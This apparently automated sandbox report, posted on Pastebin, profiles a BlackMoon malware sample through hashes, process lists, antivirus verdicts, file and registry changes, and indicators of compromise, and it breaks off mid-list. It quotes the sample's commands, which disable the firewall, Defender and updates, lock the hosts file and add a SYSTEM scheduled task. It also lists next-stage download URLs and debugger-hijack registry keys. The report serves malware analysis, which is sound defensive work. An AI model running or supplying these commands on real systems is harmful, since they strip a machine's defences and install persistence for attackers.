Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- * ID: 5936
- * MalFamily: "BlackMoon"
- * MalScore: 10.0
- * File Name: "Exes_d63f49973284b14a0eecc00e8ec1bc42.exe"
- * File Size: 5674496
- * File Type: "PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed"
- * SHA256: "7191c50d9ce73f560bc0c858e389deebeaf8ad87acd3800268708c7eaa6e3fcd"
- * MD5: "d63f49973284b14a0eecc00e8ec1bc42"
- * SHA1: "31c716f4fb5badc1cada2b29e706e9473d23efe4"
- * SHA512: "b76f22c91c32ab23a0e6ac4788dd1571c6a6c54af04331ce19aa4cc857a8715c16ba1d2d892c059c0a47e7ccea76414e18e6fcf788b47892455f59ed9d3ea591"
- * CRC32: "E35A8275"
- * SSDEEP: "98304:LzJ9Q7DjJMHgm3bAZdYetOOSVBMCcmvHEVfDX8vb1OFWeK2JE+24VU554fZjEUMz:LLQ7Dj8ZcEcOhmYBOFWeKtLp54BoUfZI"
- * Process Execution:
- "3cCNvvAhkAztO.exe",
- "cmd.exe",
- "PING.EXE",
- "bmrtbgt.exe",
- "services.exe",
- "bmrtbgt.exe",
- "nqecnaywtfdomyw18026.exe",
- "cmd.exe",
- "cmd.exe",
- "cacls.exe",
- "cmd.exe",
- "cacls.exe",
- "cmd.exe",
- "cacls.exe",
- "netsh.exe",
- "netsh.exe",
- "netsh.exe",
- "cmd.exe",
- "cmd.exe",
- "schtasks.exe",
- "netsh.exe",
- "netsh.exe",
- "netsh.exe",
- "netsh.exe",
- "netsh.exe",
- "netsh.exe",
- "netsh.exe",
- "netsh.exe",
- "netsh.exe",
- "netsh.exe",
- "netsh.exe",
- "netsh.exe",
- "cmd.exe",
- "net.exe",
- "net1.exe",
- "cmd.exe",
- "netsh.exe",
- "cmd.exe",
- "netsh.exe",
- "cmd.exe",
- "net.exe",
- "net1.exe",
- "cmd.exe",
- "net.exe",
- "net1.exe",
- "cmd.exe",
- "net.exe",
- "net1.exe",
- "cmd.exe",
- "sc.exe",
- "cmd.exe",
- "sc.exe",
- "cmd.exe",
- "svchost.exe",
- "svchost.exe",
- "WmiApSrv.exe",
- "svchost.exe",
- "WerFault.exe",
- "WerFault.exe",
- "wermgr.exe",
- "svchost.exe",
- "svchost.exe",
- "WmiPrvSE.exe"
- * Executed Commands:
- "cmd /c ping 127.0.0.1 -n 5 & Start C:\\Windows\\crbuqquc\\bmrtbgt.exe",
- "C:\\Windows\\system32\\PING.EXE ping 127.0.0.1 -n 5",
- "C:\\Windows\\crbuqquc\\bmrtbgt.exe",
- "C:\\Windows\\system32\\svchost.exe -k NetworkServiceNetworkRestricted",
- "C:\\Windows\\system32\\wbem\\WmiApSrv.exe",
- "C:\\Windows\\System32\\svchost.exe -k WerSvcGroup",
- "C:\\Windows\\system32\\svchost.exe -k netsvcs",
- "C:\\Windows\\crbuqquc\\nqecnaywtfdomyw18026.exe",
- "cmd /c echo Y|cacls C:\\Windows\\system32\\drivers\\etc\\hosts /T /D users & echo Y|cacls C:\\Windows\\system32\\drivers\\etc\\hosts /T /D administrators & echo Y|cacls C:\\Windows\\system32\\drivers\\etc\\hosts /T /D SYSTEM",
- "netsh ipsec static delete all",
- "netsh ipsec static add policy name=Bastards description=FuckingBastards",
- "netsh ipsec static add filteraction name=BastardsList action=block",
- "cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn \"ujqftiylp\" /ru system /tr \"cmd /c C:\\Windows\\Fonts\\bmrtbgt.exe\"",
- "netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=TCP",
- "netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=UDP",
- "netsh ipsec static add rule name=FuckingBastards policy=Bastards filterlist=BastardsList filteraction=BastardsList",
- "netsh ipsec static set policy name=Bastards assign=y",
- "netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=TCP",
- "netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=UDP",
- "netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=TCP",
- "netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=UDP",
- "cmd /c net stop SharedAccess",
- "cmd /c netsh firewall set opmode mode=disable",
- "cmd /c netsh Advfirewall set allprofiles state off",
- "cmd /c net stop MpsSvc",
- "cmd /c net stop WinDefend",
- "cmd /c net stop wuauserv",
- "cmd /c sc config MpsSvc start= disabled",
- "cmd /c sc config SharedAccess start= disabled",
- "cmd /c sc config WinDefend start= disabled",
- "cmd /c sc config wuauserv start= disabled",
- "C:\\Windows\\system32\\cmd.exe /S /D /c\" echo Y\"",
- "cacls C:\\Windows\\system32\\drivers\\etc\\hosts /T /D users",
- "cacls C:\\Windows\\system32\\drivers\\etc\\hosts /T /D administrators",
- "cacls C:\\Windows\\system32\\drivers\\etc\\hosts /T /D SYSTEM",
- "schtasks /create /sc minute /mo 1 /tn \"ujqftiylp\" /ru system /tr \"cmd /c C:\\Windows\\Fonts\\bmrtbgt.exe\"",
- "C:\\Windows\\system32\\WerFault.exe -u -p 2480 -s 1200",
- "C:\\Windows\\system32\\WerFault.exe -u -p 2480 -s 1204",
- "\"C:\\Windows\\system32\\wermgr.exe\" \"-queuereporting_svc\" \"C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_wmiprvse.exe_548ba4ac92e4eee4a48cdad23d45ab0c2171_cab_06c4201c\"",
- "net stop SharedAccess",
- "netsh firewall set opmode mode=disable",
- "C:\\Windows\\system32\\net1 stop SharedAccess",
- "netsh Advfirewall set allprofiles state off",
- "net stop MpsSvc",
- "net stop WinDefend",
- "net stop wuauserv",
- "C:\\Windows\\system32\\net1 stop MpsSvc",
- "C:\\Windows\\system32\\net1 stop WinDefend",
- "sc config MpsSvc start= disabled",
- "C:\\Windows\\system32\\net1 stop wuauserv",
- "sc config SharedAccess start= disabled",
- "sc config WinDefend start= disabled"
- * Signatures Detected:
- "Description": "SetUnhandledExceptionFilter detected (possible anti-debug)",
- "Details":
- "Description": "At least one process apparently crashed during execution",
- "Details":
- "Description": "Scheduled file move on reboot detected",
- "Details":
- "File Move on Reboot": "Old: C:\\Users\\user\\AppData\\Local\\Temp\\3cCNvvAhkAztO.exe -> New: C:\\Users\\user\\AppData\\Local\\Temp\\17911406\\....\\TemporaryFile"
- "File Move on Reboot": "Old: C:\\Users\\user\\AppData\\Local\\Temp\\17911406\\....\\ -> New: C:\\Users\\user\\AppData\\Local\\Temp\\17911406\\TemporaryFile"
- "File Move on Reboot": "Old: C:\\Windows\\crbuqquc\\nqecnaywtfdomyw18026.exe -> New: C:\\Windows\\Temp\\17918640\\....\\TemporaryFile"
- "File Move on Reboot": "Old: C:\\Windows\\Temp\\17918640\\....\\ -> New: C:\\Windows\\Temp\\17918640\\TemporaryFile"
- "File Move on Reboot": "Old: C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_wmiprvse.exe_548ba4ac92e4eee4a48cdad23d45ab0c2171_cab_06c4201c\\Report.wer.tmp -> New: C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_wmiprvse.exe_548ba4ac92e4eee4a48cdad23d45ab0c2171_cab_06c4201c\\Report.wer"
- "Description": "Possible date expiration check, exits too soon after checking local time",
- "Details":
- "process": "cmd.exe, PID 2252"
- "Description": "Anomalous file deletion behavior detected (10+)",
- "Details":
- "DeletedFile": "C:\\Users\\user\\AppData\\Local\\Temp\\17911406\\TemporaryFile\\TemporaryFile"
- "DeletedFile": "C:\\Windows\\Temp\\17918640\\TemporaryFile\\TemporaryFile"
- "DeletedFile": "C:\\Windows\\Tasks\\ujqftiylp.job"
- "DeletedFile": "C:\\Windows\\SoftwareDistribution\\DataStore\\Logs\\edbtmp.log"
- "DeletedFile": "C:\\Windows\\sysnative\\Tasks\\Microsoft\\Windows Defender\\MP Scheduled Scan"
- "DeletedFile": "C:\\Windows\\sysnative\\Tasks\\Microsoft\\Windows Defender\\MpIdleTask"
- "DeletedFile": "C:\\Windows\\Temp\\WER2667.tmp"
- "DeletedFile": "C:\\Windows\\Temp\\WER2667.tmp.appcompat.txt"
- "DeletedFile": "C:\\Windows\\Temp\\WER2667.tmp.appcompat.txt"
- "DeletedFile": "C:\\Windows\\Temp\\WER70DF.tmp"
- "DeletedFile": "C:\\Windows\\Temp\\WER70DF.tmp.WERInternalMetadata.xml"
- "DeletedFile": "C:\\Windows\\Temp\\WER7842.tmp"
- "DeletedFile": "C:\\Windows\\Temp\\WER7842.tmp.WERDataCollectionFailure.txt"
- "DeletedFile": "C:\\Windows\\Temp\\WER2667.tmp.appcompat.txt"
- "DeletedFile": "C:\\Windows\\Temp\\WER70DF.tmp.WERInternalMetadata.xml"
- "DeletedFile": "C:\\Windows\\Temp\\WER7842.tmp.WERDataCollectionFailure.txt"
- "Description": "Guard pages use detected - possible anti-debugging.",
- "Details":
- "Description": "A process attempted to delay the analysis task.",
- "Details":
- "Process": "netsh.exe tried to sleep 1060 seconds, actually delayed analysis time by 0 seconds"
- "Description": "Performs HTTP requests potentially not found in PCAP.",
- "Details":
- "url_ioc": "aj.0x0x0x0x0.best:63145//cfg.ini"
- "url_ioc": "xs.0x0x0x0x0.club:63145//cfg.ini"
- "url_ioc": "ui.0x0x0x0x0.xyz:63145//cfg.ini"
- "url_ioc": "qb.1c1c1c1c.best:63145//cfg.ini"
- "Description": "Starts servers listening on 0.0.0.0:0, :0",
- "Details":
- "Description": "Repeatedly searches for a not-found process, may want to run with startbrowser=1 option",
- "Details":
- "Description": "Drops a binary and executes it",
- "Details":
- "binary": "C:\\Windows\\crbuqquc\\bmrtbgt.exe"
- "binary": "C:\\Windows\\crbuqquc\\bmrtbgt.exe"
- "binary": "C:\\Windows\\crbuqquc\\nqecnaywtfdomyw18026.exe"
- "Description": "The binary likely contains encrypted or compressed data.",
- "Details":
- "section": "name: UPX1, entropy: 7.80, characteristics: IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_EXECUTE|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE, raw_size: 0x00568e00, virtual_size: 0x00569000"
- "Description": "The executable is compressed using UPX",
- "Details":
- "section": "name: UPX0, entropy: 0.00, characteristics: IMAGE_SCN_CNT_UNINITIALIZED_DATA|IMAGE_SCN_MEM_EXECUTE|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE, raw_size: 0x00000000, virtual_size: 0x00153000"
- "Description": "A ping command was executed with the -n argument possibly to delay analysis",
- "Details":
- "command": "cmd /c ping 127.0.0.1 -n 5 & Start C:\\Windows\\crbuqquc\\bmrtbgt.exe"
- "command": "C:\\Windows\\system32\\PING.EXE ping 127.0.0.1 -n 5"
- "Description": "Uses Windows utilities for basic functionality",
- "Details":
- "command": "cmd /c ping 127.0.0.1 -n 5 & Start C:\\Windows\\crbuqquc\\bmrtbgt.exe"
- "command": "cmd /c ping 127.0.0.1 -n 5 & Start C:\\Windows\\crbuqquc\\bmrtbgt.exe"
- "command": "C:\\Windows\\system32\\PING.EXE ping 127.0.0.1 -n 5"
- "command": "cmd /c echo Y|cacls C:\\Windows\\system32\\drivers\\etc\\hosts /T /D users & echo Y|cacls C:\\Windows\\system32\\drivers\\etc\\hosts /T /D administrators & echo Y|cacls C:\\Windows\\system32\\drivers\\etc\\hosts /T /D SYSTEM"
- "command": "netsh ipsec static delete all"
- "command": "netsh ipsec static add policy name=Bastards description=FuckingBastards"
- "command": "netsh ipsec static add filteraction name=BastardsList action=block"
- "command": "cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn \"ujqftiylp\" /ru system /tr \"cmd /c C:\\Windows\\Fonts\\bmrtbgt.exe\""
- "command": "cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn \"ujqftiylp\" /ru system /tr \"cmd /c C:\\Windows\\Fonts\\bmrtbgt.exe\""
- "command": "cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn \"ujqftiylp\" /ru system /tr \"cmd /c C:\\Windows\\Fonts\\bmrtbgt.exe\""
- "command": "netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=TCP"
- "command": "netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=UDP"
- "command": "netsh ipsec static add rule name=FuckingBastards policy=Bastards filterlist=BastardsList filteraction=BastardsList"
- "command": "netsh ipsec static set policy name=Bastards assign=y"
- "command": "netsh ipsec static set policy name=Bastards assign=y"
- "command": "netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=TCP"
- "command": "netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=UDP"
- "command": "netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=TCP"
- "command": "netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=UDP"
- "command": "cmd /c net stop SharedAccess"
- "command": "cmd /c net stop SharedAccess"
- "command": "cmd /c netsh firewall set opmode mode=disable"
- "command": "cmd /c netsh firewall set opmode mode=disable"
- "command": "cmd /c netsh firewall set opmode mode=disable"
- "command": "cmd /c netsh Advfirewall set allprofiles state off"
- "command": "cmd /c netsh Advfirewall set allprofiles state off"
- "command": "cmd /c netsh Advfirewall set allprofiles state off"
- "command": "cmd /c net stop MpsSvc"
- "command": "cmd /c net stop MpsSvc"
- "command": "cmd /c net stop WinDefend"
- "command": "cmd /c net stop WinDefend"
- "command": "cmd /c net stop wuauserv"
- "command": "cmd /c net stop wuauserv"
- "command": "cmd /c sc config MpsSvc start= disabled"
- "command": "cmd /c sc config MpsSvc start= disabled"
- "command": "cmd /c sc config SharedAccess start= disabled"
- "command": "cmd /c sc config SharedAccess start= disabled"
- "command": "cmd /c sc config WinDefend start= disabled"
- "command": "cmd /c sc config WinDefend start= disabled"
- "command": "cmd /c sc config wuauserv start= disabled"
- "command": "cmd /c sc config wuauserv start= disabled"
- "command": "C:\\Windows\\system32\\cmd.exe /S /D /c\" echo Y\""
- "command": "schtasks /create /sc minute /mo 1 /tn \"ujqftiylp\" /ru system /tr \"cmd /c C:\\Windows\\Fonts\\bmrtbgt.exe\""
- "command": "schtasks /create /sc minute /mo 1 /tn \"ujqftiylp\" /ru system /tr \"cmd /c C:\\Windows\\Fonts\\bmrtbgt.exe\""
- "command": "schtasks /create /sc minute /mo 1 /tn \"ujqftiylp\" /ru system /tr \"cmd /c C:\\Windows\\Fonts\\bmrtbgt.exe\""
- "command": "net stop SharedAccess"
- "command": "netsh firewall set opmode mode=disable"
- "command": "netsh firewall set opmode mode=disable"
- "command": "netsh Advfirewall set allprofiles state off"
- "command": "netsh Advfirewall set allprofiles state off"
- "command": "net stop MpsSvc"
- "command": "net stop WinDefend"
- "command": "net stop wuauserv"
- "command": "sc config MpsSvc start= disabled"
- "command": "sc config SharedAccess start= disabled"
- "command": "sc config WinDefend start= disabled"
- "Description": "Deletes its original binary from disk",
- "Details":
- "Description": "Behavioural detection: Transacted Hollowing",
- "Details":
- "Description": "Attempts to stop active services",
- "Details":
- "servicename": "MPSSVC"
- "servicename": "WINDEFEND"
- "servicename": "WUAUSERV"
- "Description": "Attempts to repeatedly call a single API many times in order to delay analysis time",
- "Details":
- "Spam": "services.exe (504) called API GetSystemTimeAsFileTime 9465367 times"
- "Description": "Behavior consistent with a dropper attempting to download the next stage.",
- "Details":
- "File": "/cfg.ini was requested from hosts: aj.0x0x0x0x0.best, xs.0x0x0x0x0.club, ui.0x0x0x0x0.xyz, qb.1c1c1c1c.best"
- "Description": "Attempts to execute a Living Off The Land Binary command for post exeploitation",
- "Details":
- "MITRE T1078 - schtask": "(Tactic: Execution, Persistence, Privilege Escalation)"
- "Description": "Installs itself for autorun at Windows startup",
- "Details":
- "service name": "pmtypkytl"
- "service path": "C:\\Windows\\crbuqquc\\bmrtbgt.exe"
- "key": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\netsh.exe\\Debugger"
- "data": "C:\\Windows\\system32\\svchost.exe"
- "key": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\schtasks.exe\\Debugger"
- "data": "C:\\Windows\\system32\\svchost.exe"
- "key": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\at.exe\\Debugger"
- "data": "C:\\Windows\\system32\\svchost.exe"
- "key": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\cacls.exe\\Debugger"
- "data": "C:\\Windows\\system32\\svchost.exe"
- "task": "cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn \"ujqftiylp\" /ru system /tr \"cmd /c C:\\Windows\\Fonts\\bmrtbgt.exe\""
- "Description": "File has been identified by 56 Antiviruses on VirusTotal as malicious",
- "Details":
- "MicroWorld-eScan": "Generic.Backdoor.Torr.22F25429"
- "FireEye": "Generic.mg.d63f49973284b14a"
- "CAT-QuickHeal": "Trojanpws.Qqpass.16554"
- "McAfee": "Artemis!D63F49973284"
- "Cylance": "Unsafe"
- "VIPRE": "Trojan.Win32.Generic!BT"
- "K7AntiVirus": "Adware ( 005070c51 )"
- "Alibaba": "VirTool:Win32/CeeInject.497cc0bc"
- "K7GW": "Adware ( 005070c51 )"
- "Cybereason": "malicious.73284b"
- "Arcabit": "Generic.Backdoor.Torr.22F25429"
- "Invincea": "heuristic"
- "Symantec": "Trojan.Gen.MBT"
- "APEX": "Malicious"
- "ClamAV": "Win.Trojan.BlackMoon-7136668-0"
- "Kaspersky": "HEUR:Trojan.Win32.Generic"
- "BitDefender": "Generic.Backdoor.Torr.22F25429"
- "NANO-Antivirus": "Trojan.Win32.MS17010.gcobuw"
- "AegisLab": "Trojan.Win32.Generic.4!c"
- "Avast": "Win32:Malware-gen"
- "Ad-Aware": "Generic.Backdoor.Torr.22F25429"
- "Sophos": "Generic PUA DB (PUA)"
- "Comodo": "Packed.Win32.MUPX.Gen@24tbus"
- "F-Secure": "Heuristic.HEUR/AGEN.1014775"
- "DrWeb": "Trojan.Hosts.46779"
- "Zillya": "Trojan.Generic.Win32.955214"
- "TrendMicro": "TROJ_GEN.R002C0WJ319"
- "McAfee-GW-Edition": "BehavesLike.Win32.Injector.tc"
- "Emsisoft": "Generic.Backdoor.Torr.22F25429 (B)"
- "SentinelOne": "DFI - Malicious PE"
- "Cyren": "W32/Kryptik.AHP.gen!Eldorado"
- "Webroot": "W32.Malware.Gen"
- "Avira": "HEUR/AGEN.1014775"
- "Antiy-AVL": "HackTool/Win64.Mimikatz.a"
- "Microsoft": "Trojan:Win32/Dynamer!rfn"
- "Endgame": "malicious (moderate confidence)"
- "ZoneAlarm": "HEUR:Trojan.Win32.Generic"
- "GData": "Win32.Trojan.Agent.WP"
- "AhnLab-V3": "Malware/Win32.Generic.C3367812"
- "Acronis": "suspicious"
- "VBA32": "BScope.Trojan.Occamy"
- "ALYac": "Generic.Backdoor.Torr.22F25429"
- "MAX": "malware (ai score=85)"
- "Malwarebytes": "RiskWare.BlackMoon.UPX"
- "ESET-NOD32": "a variant of Win32/Packed.BlackMoon.A potentially unwanted"
- "TrendMicro-HouseCall": "TROJ_GEN.R002C0WJ319"
- "Rising": "Trojan.Downloader!1.B837 (TFE:5:AvnUCUT9PKC)"
- "Yandex": "Trojan.Agent!B7b1rLf/4AM"
- "Ikarus": "Trojan-PSW.QQpass"
- "eGambit": "hacktool.mimikatz"
- "Fortinet": "W32/Kryptik.AHP!tr"
- "MaxSecure": "Trojan.Malware.300983.susgen"
- "AVG": "FileRepMalware"
- "Panda": "Trj/Genetic.gen"
- "CrowdStrike": "win/malicious_confidence_90% (W)"
- "Qihoo-360": "HEUR/QVM11.1.4D0D.Malware.Gen"
- "Description": "Checks the system manufacturer, likely for anti-virtualization",
- "Details":
- "Description": "Clamav Hits in Target/Dropped/SuriExtracted",
- "Details":
- "target": "clamav:Win.Trojan.BlackMoon-7136668-0, sha256:7191c50d9ce73f560bc0c858e389deebeaf8ad87acd3800268708c7eaa6e3fcd, type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed"
- "dropped": "clamav:Win.Trojan.BlackMoon-7136668-0, sha256:7191c50d9ce73f560bc0c858e389deebeaf8ad87acd3800268708c7eaa6e3fcd , guest_paths:C:\\Windows\\crbuqquc\\bmrtbgt.exe*C:\\Users\\user\\AppData\\Local\\Temp\\17911406\\....\\TemporaryFile, type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed"
- "dropped": "clamav:Win.Trojan.BlackMoon-7136668-0, sha256:8b668cb3af54aa46714a92d31e5e189b96ddda5bd3fdb98dc567e3c3f40fba83 , guest_paths:C:\\Windows\\crbuqquc\\bmrtbgt.exe*C:\\Windows\\Fonts\\bmrtbgt.exe, type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed"
- "Description": "Creates a copy of itself",
- "Details":
- "copy": "C:\\Windows\\crbuqquc\\bmrtbgt.exe"
- "copy": "C:\\Users\\user\\AppData\\Local\\Temp\\17911406\\....\\TemporaryFile"
- "Description": "The sample wrote data to the system hosts file.",
- "Details":
- "Description": "Collects information to fingerprint the system",
- "Details":
- "Description": "Uses suspicious command line tools or Windows utilities",
- "Details":
- "command": "cmd /c echo Y|cacls C:\\Windows\\system32\\drivers\\etc\\hosts /T /D users & echo Y|cacls C:\\Windows\\system32\\drivers\\etc\\hosts /T /D administrators & echo Y|cacls C:\\Windows\\system32\\drivers\\etc\\hosts /T /D SYSTEM"
- "command": "cacls C:\\Windows\\system32\\drivers\\etc\\hosts /T /D users"
- "command": "cacls C:\\Windows\\system32\\drivers\\etc\\hosts /T /D administrators"
- "command": "cacls C:\\Windows\\system32\\drivers\\etc\\hosts /T /D SYSTEM"
- * Started Service:
- "pmtypkytl",
- "WerSvc",
- "IKEEXT",
- "PolicyAgent",
- "wmiApSrv"
- * Mutexes:
- "RasPbFile",
- "IESQMMUTEX_0_208",
- "Global\\RefreshRA_Mutex_Lib",
- "Global\\RefreshRA_Mutex",
- "Global\\RefreshRA_Mutex_Flag",
- "Global\\WmiApSrv",
- "Local\\WERReportingForProcess2480",
- "Global\\\\xe5\\x88\\x90\\xc8\\x93",
- "DBWinMutex",
- "Global\\\\xee\\xbb\\xb0\\xcd\\x96",
- "WERUI_APPCRASH-548ba4ac92e4eee4a48cdad23d45ab0c2171"
- * Modified Files:
- "C:\\Windows\\crbuqquc\\bmrtbgt.exe",
- "C:\\Users\\user\\AppData\\Local\\Temp\\17911406\\....\\TemporaryFile",
- "C:\\Users\\user\\AppData\\Local\\Temp\\17911406\\TemporaryFile",
- "C:\\Windows\\crbuqquc\\nqecnaywtfdomyw18026.exe",
- "C:\\Windows\\System32\\drivers\\etc\\hosts",
- "C:\\Windows\\Temp\\kcrlpplil\\grltlilub.exe",
- "C:\\Windows\\Fonts\\bmrtbgt.exe",
- "C:\\Windows\\Temp\\17918640\\....\\TemporaryFile",
- "C:\\Windows\\Temp\\17918640\\TemporaryFile",
- "\\Device\\NamedPipe",
- "\\Device\\Http\\Communication",
- "C:\\Windows\\appcompat\\Programs\\RecentFileCache.bcf",
- "C:\\Windows\\SoftwareDistribution\\DataStore\\DataStore.edb",
- "C:\\Windows\\SoftwareDistribution\\DataStore\\Logs\\edb.chk",
- "\\??\\WMIDataDevice",
- "\\??\\PIPE\\samr",
- "C:\\Windows\\sysnative\\wbem\\repository\\WRITABLE.TST",
- "C:\\Windows\\sysnative\\wbem\\repository\\MAPPING1.MAP",
- "C:\\Windows\\sysnative\\wbem\\repository\\MAPPING2.MAP",
- "C:\\Windows\\sysnative\\wbem\\repository\\MAPPING3.MAP",
- "C:\\Windows\\sysnative\\wbem\\repository\\OBJECTS.DATA",
- "C:\\Windows\\sysnative\\wbem\\repository\\INDEX.BTR",
- "\\??\\pipe\\PIPE_EVENTROOT\\CIMV2WMI SELF-INSTRUMENTATION EVENT PROVIDER",
- "\\??\\pipe\\PIPE_EVENTROOT\\CIMV2PROVIDERSUBSYSTEM",
- "C:\\Windows\\Temp\\WER2667.tmp.appcompat.txt",
- "C:\\Windows\\Temp\\WER70DF.tmp.WERInternalMetadata.xml",
- "C:\\Windows\\Temp\\WER7842.tmp.WERDataCollectionFailure.txt",
- "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_wmiprvse.exe_548ba4ac92e4eee4a48cdad23d45ab0c2171_cab_06c4201c\\WER2667.tmp.appcompat.txt",
- "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_wmiprvse.exe_548ba4ac92e4eee4a48cdad23d45ab0c2171_cab_06c4201c\\WER70DF.tmp.WERInternalMetadata.xml",
- "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_wmiprvse.exe_548ba4ac92e4eee4a48cdad23d45ab0c2171_cab_06c4201c\\WER7842.tmp.WERDataCollectionFailure.txt",
- "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_wmiprvse.exe_548ba4ac92e4eee4a48cdad23d45ab0c2171_cab_06c4201c\\Report.wer",
- "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_wmiprvse.exe_548ba4ac92e4eee4a48cdad23d45ab0c2171_cab_06c4201c\\Report.wer.tmp"
- * Deleted Files:
- "C:\\Users\\user\\AppData\\Local\\Temp\\3cCNvvAhkAztO.exe",
- "C:\\Users\\user\\AppData\\Local\\Temp\\17911406\\....\\",
- "C:\\Users\\user\\AppData\\Local\\Temp\\17911406\\TemporaryFile\\TemporaryFile",
- "C:\\Windows\\crbuqquc\\nqecnaywtfdomyw18026.exe",
- "C:\\Windows\\Temp\\17918640\\....\\",
- "C:\\Windows\\Temp\\17918640\\TemporaryFile\\TemporaryFile",
- "C:\\Windows\\Tasks\\ujqftiylp.job",
- "C:\\Windows\\SoftwareDistribution\\DataStore\\Logs\\edbtmp.log",
- "C:\\Windows\\sysnative\\Tasks\\Microsoft\\Windows Defender\\MP Scheduled Scan",
- "C:\\Windows\\sysnative\\Tasks\\Microsoft\\Windows Defender\\MpIdleTask",
- "C:\\Windows\\Temp\\WER2667.tmp",
- "C:\\Windows\\Temp\\WER2667.tmp.appcompat.txt",
- "C:\\Windows\\Temp\\WER70DF.tmp",
- "C:\\Windows\\Temp\\WER70DF.tmp.WERInternalMetadata.xml",
- "C:\\Windows\\Temp\\WER7842.tmp",
- "C:\\Windows\\Temp\\WER7842.tmp.WERDataCollectionFailure.txt",
- "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_wmiprvse.exe_548ba4ac92e4eee4a48cdad23d45ab0c2171_cab_06c4201c\\Report.wer.tmp"
- * Modified Registry Keys:
- "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\PolicyAgent\\Type",
- "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\PolicyAgent\\Start",
- "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\wmiApSrv\\Type",
- "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\Winmgmt\\Type",
- "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\WerSvc\\Type",
- "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\IKEEXT\\Type",
- "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\IKEEXT\\Start",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\cacls.exe",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\cacls.exe\\Debugger",
- "HKEY_USERS\\.DEFAULT\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections\\DefaultConnectionSettings",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\netsh.exe",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\netsh.exe\\Debugger",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\schtasks.exe",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\schtasks.exe\\Debugger",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\at.exe",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\at.exe\\Debugger",
- "HKEY_USERS\\.DEFAULT\\SOFTWARE\\Classes\\Local Settings\\MuiCache\\2F\\52C64B7E\\LanguageList",
- "HKEY_USERS\\.DEFAULT\\SOFTWARE\\Classes\\Local Settings\\MuiCache\\2F\\52C64B7E\\@%SystemRoot%\\system32\\dhcpqec.dll,-100",
- "HKEY_USERS\\.DEFAULT\\SOFTWARE\\Classes\\Local Settings\\MuiCache\\2F\\52C64B7E\\@%SystemRoot%\\system32\\dhcpqec.dll,-101",
